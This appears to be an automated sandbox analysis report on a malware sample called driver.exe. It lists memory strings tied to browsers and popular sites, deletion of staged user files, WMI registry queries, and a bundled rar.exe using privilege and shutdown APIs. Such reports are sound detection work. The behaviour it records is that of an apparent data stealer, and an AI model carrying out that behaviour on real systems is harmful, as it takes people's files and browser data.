              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: driver.exe, 00000002.00000003.2186287198.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441499292.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335260534.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2115178602.000001C0EED48000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2445265789.000001C0EF730000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE7D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: driver.exe, 00000002.00000003.2188298866.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149672861.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: driver.exe, 00000002.00000003.2115178602.000001C0EED83000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2130149683.000001C0EED83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: driver.exe, 00000002.00000003.2190639950.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2103195176.000001C0EE37C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335643404.000001C0EE31D000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107791950.000001C0EE37C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED9C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441098500.000001C0EE320000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149672861.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2191367596.000001C0EE311000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435347173.000001C0EE31D000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE251000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: driver.exe, 00000002.00000002.2445265789.000001C0EF768000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2449471266.00007FF8A861A000.00000004.00000001.01000000.00000011.sdmp, driver.exe, 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\driver.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\CZQKSDDMWR.mp3Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\BJZFPPWAPT.jpgJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\BJZFPPWAPT.jpgJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\EOWRVPQCCS.xlsxJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\EWZCVGNOWT.pdfJump to behavior
              Source: cmd.exeProcess created: 59

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425E21C: FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,77_2_00007FF75425E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75428B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,77_2_00007FF75428B57C
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP7761.tmp
              Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP5687.tmp
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29B8BD00_2_00007FF6A29B8BD0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D69D40_2_00007FF6A29D69D4
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D09380_2_00007FF6A29D0938
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29B10000_2_00007FF6A29B1000
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C1BC00_2_00007FF6A29C1BC0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29BA34B0_2_00007FF6A29BA34B
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29BA4E40_2_00007FF6A29BA4E4
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29BAD1D0_2_00007FF6A29BAD1D
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D5C700_2_00007FF6A29D5C70
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C2C800_2_00007FF6A29C2C80
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D3C800_2_00007FF6A29D3C80
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D09380_2_00007FF6A29D0938
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D64880_2_00007FF6A29D6488
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C21D40_2_00007FF6A29C21D4
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C3A140_2_00007FF6A29C3A14
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C81540_2_00007FF6A29C8154
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C19B40_2_00007FF6A29C19B4
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29CDACC0_2_00007FF6A29CDACC
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C1FD00_2_00007FF6A29C1FD0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C88040_2_00007FF6A29C8804
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29CDF600_2_00007FF6A29CDF60
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D97980_2_00007FF6A29D9798
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C17B00_2_00007FF6A29C17B0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D18E40_2_00007FF6A29D18E4
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D411C0_2_00007FF6A29D411C
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29B98700_2_00007FF6A29B9870
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29CE5E00_2_00007FF6A29CE5E0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C1DC40_2_00007FF6A29C1DC4
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C36100_2_00007FF6A29C3610
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C5DA00_2_00007FF6A29C5DA0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D5EEC0_2_00007FF6A29D5EEC
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29C9F100_2_00007FF6A29C9F10
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D5C702_2_00007FF6A29D5C70
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D69D42_2_00007FF6A29D69D4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29B10002_2_00007FF6A29B1000
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C1BC02_2_00007FF6A29C1BC0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29B8BD02_2_00007FF6A29B8BD0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29BA34B2_2_00007FF6A29BA34B
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29BA4E42_2_00007FF6A29BA4E4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29BAD1D2_2_00007FF6A29BAD1D
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C2C802_2_00007FF6A29C2C80
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D3C802_2_00007FF6A29D3C80
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D09382_2_00007FF6A29D0938
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D64882_2_00007FF6A29D6488
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C21D42_2_00007FF6A29C21D4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C3A142_2_00007FF6A29C3A14
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D09382_2_00007FF6A29D0938
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C81542_2_00007FF6A29C8154
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C19B42_2_00007FF6A29C19B4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29CDACC2_2_00007FF6A29CDACC
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C1FD02_2_00007FF6A29C1FD0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C88042_2_00007FF6A29C8804
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29CDF602_2_00007FF6A29CDF60
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D97982_2_00007FF6A29D9798
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C17B02_2_00007FF6A29C17B0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D18E42_2_00007FF6A29D18E4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D411C2_2_00007FF6A29D411C
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29B98702_2_00007FF6A29B9870
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29CE5E02_2_00007FF6A29CE5E0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C1DC42_2_00007FF6A29C1DC4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C36102_2_00007FF6A29C3610
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C5DA02_2_00007FF6A29C5DA0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D5EEC2_2_00007FF6A29D5EEC
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29C9F102_2_00007FF6A29C9F10
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80303302_2_00007FF8A8030330
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A7F819502_2_00007FF8A7F81950
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A7F822702_2_00007FF8A7F82270
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A7F813002_2_00007FF8A7F81300
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8085C002_2_00007FF8A8085C00
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80789202_2_00007FF8A8078920
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041EE22_2_00007FF8A8041EE2
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80416182_2_00007FF8A8041618
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041A0F2_2_00007FF8A8041A0F
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80426172_2_00007FF8A8042617
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80BAC802_2_00007FF8A80BAC80
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A804149C2_2_00007FF8A804149C
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041CBC2_2_00007FF8A8041CBC
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041B542_2_00007FF8A8041B54
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A804117C2_2_00007FF8A804117C
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80427022_2_00007FF8A8042702
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041D932_2_00007FF8A8041D93
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80416FE2_2_00007FF8A80416FE
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80487202_2_00007FF8A8048720
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A804116D2_2_00007FF8A804116D
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80B88702_2_00007FF8A80B8870
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A808D9802_2_00007FF8A808D980
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80415962_2_00007FF8A8041596
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8107A202_2_00007FF8A8107A20
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8089A602_2_00007FF8A8089A60
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A806BAE02_2_00007FF8A806BAE0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A804155A2_2_00007FF8A804155A
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80421E42_2_00007FF8A80421E4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041FDC2_2_00007FF8A8041FDC
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A808DE502_2_00007FF8A808DE50
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80415462_2_00007FF8A8041546
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041AD72_2_00007FF8A8041AD7
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80660302_2_00007FF8A8066030
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80424DC2_2_00007FF8A80424DC
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80AD2D02_2_00007FF8A80AD2D0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80417F82_2_00007FF8A80417F8
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041C122_2_00007FF8A8041C12
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80B36502_2_00007FF8A80B3650
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80421C62_2_00007FF8A80421C6
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80413DE2_2_00007FF8A80413DE
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80416542_2_00007FF8A8041654
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86190602_2_00007FF8A8619060
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86B29E02_2_00007FF8A86B29E0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86D4CF02_2_00007FF8A86D4CF0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8669D102_2_00007FF8A8669D10
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86CCFB02_2_00007FF8A86CCFB0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86722E02_2_00007FF8A86722E0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86692C02_2_00007FF8A86692C0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86669402_2_00007FF8A8666940
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86959102_2_00007FF8A8695910
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8679A302_2_00007FF8A8679A30
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A865FA202_2_00007FF8A865FA20
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86A6BD02_2_00007FF8A86A6BD0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86B4BB02_2_00007FF8A86B4BB0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8659BA02_2_00007FF8A8659BA0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86BBB802_2_00007FF8A86BBB80
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8702C602_2_00007FF8A8702C60
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A866CC402_2_00007FF8A866CC40
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8653C102_2_00007FF8A8653C10
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A868CCE92_2_00007FF8A868CCE9
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86ACCD02_2_00007FF8A86ACCD0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86ABD502_2_00007FF8A86ABD50
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A865BD402_2_00007FF8A865BD40
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86DAD202_2_00007FF8A86DAD20
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86E8D002_2_00007FF8A86E8D00
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8660DD02_2_00007FF8A8660DD0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A867DE402_2_00007FF8A867DE40
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86ECF202_2_00007FF8A86ECF20
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8694F002_2_00007FF8A8694F00
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86DC0402_2_00007FF8A86DC040
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A87050302_2_00007FF8A8705030
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86770D02_2_00007FF8A86770D0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86780B02_2_00007FF8A86780B0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86541202_2_00007FF8A8654120
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86621F02_2_00007FF8A86621F0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A86531A52_2_00007FF8A86531A5
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A866D2B02_2_00007FF8A866D2B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 47_2_00007FF8460A441A47_2_00007FF8460A441A
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424B54077_2_00007FF75424B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424188477_2_00007FF754241884
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425118077_2_00007FF754251180
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542482F077_2_00007FF7542482F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542554C077_2_00007FF7542554C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75426AE1077_2_00007FF75426AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754250A2C77_2_00007FF754250A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF754277B2477_2_00007FF754277B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75424ABA077_2_00007FF75424ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75426F5B077_2_00007FF75426F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75427F59C77_2_00007FF75427F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425859877_2_00007FF754258598
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429260C77_2_00007FF75429260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542765FC77_2_00007FF7542765FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429766077_2_00007FF754297660
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542A86D477_2_00007FF7542A86D4
